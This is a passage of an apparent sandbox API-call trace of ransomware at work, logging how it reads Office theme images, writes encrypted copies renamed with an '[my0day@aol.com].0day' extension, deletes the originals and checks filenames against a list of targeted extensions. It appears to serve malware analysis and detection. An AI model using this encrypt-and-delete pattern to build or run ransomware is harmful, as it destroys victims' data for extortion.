Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.334] lstrlenW (lpString=".1cd") returned 4 [0044.334] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.334] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\THMBNAIL.PNG") returned 75 [0044.334] lstrlenW (lpString=".jpg") returned 4 [0044.334] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.334] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0044.334] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.334] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.728] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=29925) returned 1 [0044.728] CloseHandle (hObject=0x1c4) returned 1 [0044.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png")) returned 0x20 [0044.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.728] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.728] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.729] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.729] GetLastError () returned 0x0 [0044.729] ReadFile (in: hFile=0x1c4, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x74e5, lpOverlapped=0x0) returned 1 [0044.746] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x74f0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x74f0, lpOverlapped=0x0) returned 1 [0044.748] ReadFile (in: hFile=0x1c4, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.748] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.748] SetEndOfFile (hFile=0x1d8) returned 1 [0044.748] CloseHandle (hObject=0x1d8) returned 1 [0044.748] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.748] SetEndOfFile (hFile=0x1c4) returned 1 [0044.749] CloseHandle (hObject=0x1c4) returned 1 [0044.749] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.749] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png")) returned 1 [0044.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.750] lstrlenW (lpString=".doc") returned 4 [0044.750] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.750] lstrlenW (lpString=".docx") returned 5 [0044.750] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.750] lstrlenW (lpString=".pdf") returned 4 [0044.750] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.750] lstrlenW (lpString=".xls") returned 4 [0044.750] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.750] lstrlenW (lpString=".xlsx") returned 5 [0044.750] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.750] lstrlenW (lpString=".ppt") returned 4 [0044.750] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.750] lstrlenW (lpString=".zip") returned 4 [0044.750] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.750] lstrlenW (lpString=".rar") returned 4 [0044.750] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.750] lstrlenW (lpString=".bz2") returned 4 [0044.750] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.750] lstrlenW (lpString=".7z") returned 3 [0044.750] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.750] lstrlenW (lpString=".dbf") returned 4 [0044.750] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.750] lstrlenW (lpString=".1cd") returned 4 [0044.750] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.750] lstrlenW (lpString=".jpg") returned 4 [0044.750] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.751] lstrlenW (lpString=".doc") returned 4 [0044.751] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.751] lstrlenW (lpString=".docx") returned 5 [0044.751] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.751] lstrlenW (lpString=".pdf") returned 4 [0044.751] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.751] lstrlenW (lpString=".xls") returned 4 [0044.751] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.751] lstrlenW (lpString=".xlsx") returned 5 [0044.751] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.751] lstrlenW (lpString=".ppt") returned 4 [0044.751] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.751] lstrlenW (lpString=".zip") returned 4 [0044.751] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.751] lstrlenW (lpString=".rar") returned 4 [0044.751] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.751] lstrlenW (lpString=".bz2") returned 4 [0044.751] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.751] lstrlenW (lpString=".7z") returned 3 [0044.751] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.751] lstrlenW (lpString=".dbf") returned 4 [0044.751] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.751] lstrlenW (lpString=".1cd") returned 4 [0044.751] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0044.751] lstrlenW (lpString=".jpg") returned 4 [0044.751] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.752] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0044.752] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.752] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.752] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=3957) returned 1 [0044.752] CloseHandle (hObject=0x1c4) returned 1 [0044.752] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif")) returned 0x20 [0044.752] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.752] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.752] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.752] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.752] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0044.818] GetLastError () returned 0x0 [0044.818] ReadFile (in: hFile=0x1c4, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0xf75, lpOverlapped=0x0) returned 1 [0044.895] WriteFile (in: hFile=0x194, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xf80, lpOverlapped=0x0) returned 1 [0044.898] ReadFile (in: hFile=0x1c4, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.898] WriteFile (in: hFile=0x194, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.898] SetEndOfFile (hFile=0x194) returned 1 [0044.898] CloseHandle (hObject=0x194) returned 1 [0044.898] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.898] SetEndOfFile (hFile=0x1c4) returned 1 [0044.899] CloseHandle (hObject=0x1c4) returned 1 [0044.899] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.899] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif")) returned 1 [0044.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0044.899] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0044.899] lstrlenW (lpString=".doc") returned 4 [0044.899] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.900] lstrlenW (lpString=".docx") returned 5 [0044.900] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.900] lstrlenW (lpString=".pdf") returned 4 [0044.900] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.900] lstrlenW (lpString=".xls") returned 4 [0044.900] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.900] lstrlenW (lpString=".xlsx") returned 5 [0044.900] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.900] lstrlenW (lpString=".ppt") returned 4 [0044.900] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0044.900] lstrlenW (lpString=".zip") returned 4 [0044.900] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.900] lstrlenW (lpString=".rar") returned 4 [0044.900] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.900] lstrlenW (lpString=".bz2") returned 4 [0044.900] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.900] lstrlenW (lpString=".7z") returned 3 [0044.900] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0044.900] lstrlenW (lpString=".dbf") returned 4 [0044.900] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0044.900] lstrlenW (lpString=".1cd") returned 4 [0044.900] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0044.900] lstrlenW (lpString=".jpg") returned 4 [0044.900] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0044.900] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0044.900] lstrlenW (lpString=".doc") returned 4 [0044.900] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.900] lstrlenW (lpString=".docx") returned 5 [0044.900] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.900] lstrlenW (lpString=".pdf") returned 4 [0044.901] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.901] lstrlenW (lpString=".xls") returned 4 [0044.901] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.901] lstrlenW (lpString=".xlsx") returned 5 [0044.901] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.901] lstrlenW (lpString=".ppt") returned 4 [0044.901] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0044.901] lstrlenW (lpString=".zip") returned 4 [0044.901] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.901] lstrlenW (lpString=".rar") returned 4 [0044.901] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.901] lstrlenW (lpString=".bz2") returned 4 [0044.901] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.901] lstrlenW (lpString=".7z") returned 3 [0044.901] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0044.901] lstrlenW (lpString=".dbf") returned 4 [0044.901] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0044.901] lstrlenW (lpString=".1cd") returned 4 [0044.901] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.901] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 76 [0044.901] lstrlenW (lpString=".jpg") returned 4 [0044.901] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.901] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0044.901] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.901] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0044.951] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=33277) returned 1 [0044.951] CloseHandle (hObject=0x170) returned 1 [0044.951] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png")) returned 0x20 [0044.951] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.951] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0044.951] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.951] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.951] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.952] GetLastError () returned 0x0 [0044.952] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x81fd, lpOverlapped=0x0) returned 1 [0045.056] WriteFile (in: hFile=0x188, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x8200, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x8200, lpOverlapped=0x0) returned 1 [0045.058] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.058] WriteFile (in: hFile=0x188, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.058] SetEndOfFile (hFile=0x188) returned 1 [0045.058] CloseHandle (hObject=0x188) returned 1 [0045.058] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.058] SetEndOfFile (hFile=0x170) returned 1 [0045.059] CloseHandle (hObject=0x170) returned 1 [0045.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.059] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png")) returned 1 [0045.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.059] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.059] lstrlenW (lpString=".doc") returned 4 [0045.059] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.059] lstrlenW (lpString=".docx") returned 5 [0045.059] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.059] lstrlenW (lpString=".pdf") returned 4 [0045.059] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.060] lstrlenW (lpString=".xls") returned 4 [0045.060] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.060] lstrlenW (lpString=".xlsx") returned 5 [0045.060] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.060] lstrlenW (lpString=".ppt") returned 4 [0045.060] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.060] lstrlenW (lpString=".zip") returned 4 [0045.060] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.060] lstrlenW (lpString=".rar") returned 4 [0045.060] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.060] lstrlenW (lpString=".bz2") returned 4 [0045.060] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.060] lstrlenW (lpString=".7z") returned 3 [0045.060] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.060] lstrlenW (lpString=".dbf") returned 4 [0045.060] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.060] lstrlenW (lpString=".1cd") returned 4 [0045.060] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.060] lstrlenW (lpString=".jpg") returned 4 [0045.060] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.060] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.060] lstrlenW (lpString=".doc") returned 4 [0045.060] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.060] lstrlenW (lpString=".docx") returned 5 [0045.060] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.060] lstrlenW (lpString=".pdf") returned 4 [0045.060] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.060] lstrlenW (lpString=".xls") returned 4 [0045.060] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.061] lstrlenW (lpString=".xlsx") returned 5 [0045.061] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.061] lstrlenW (lpString=".ppt") returned 4 [0045.061] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.061] lstrlenW (lpString=".zip") returned 4 [0045.061] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.061] lstrlenW (lpString=".rar") returned 4 [0045.061] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.061] lstrlenW (lpString=".bz2") returned 4 [0045.061] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.061] lstrlenW (lpString=".7z") returned 3 [0045.061] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.061] lstrlenW (lpString="C:\\Program Files\\Common 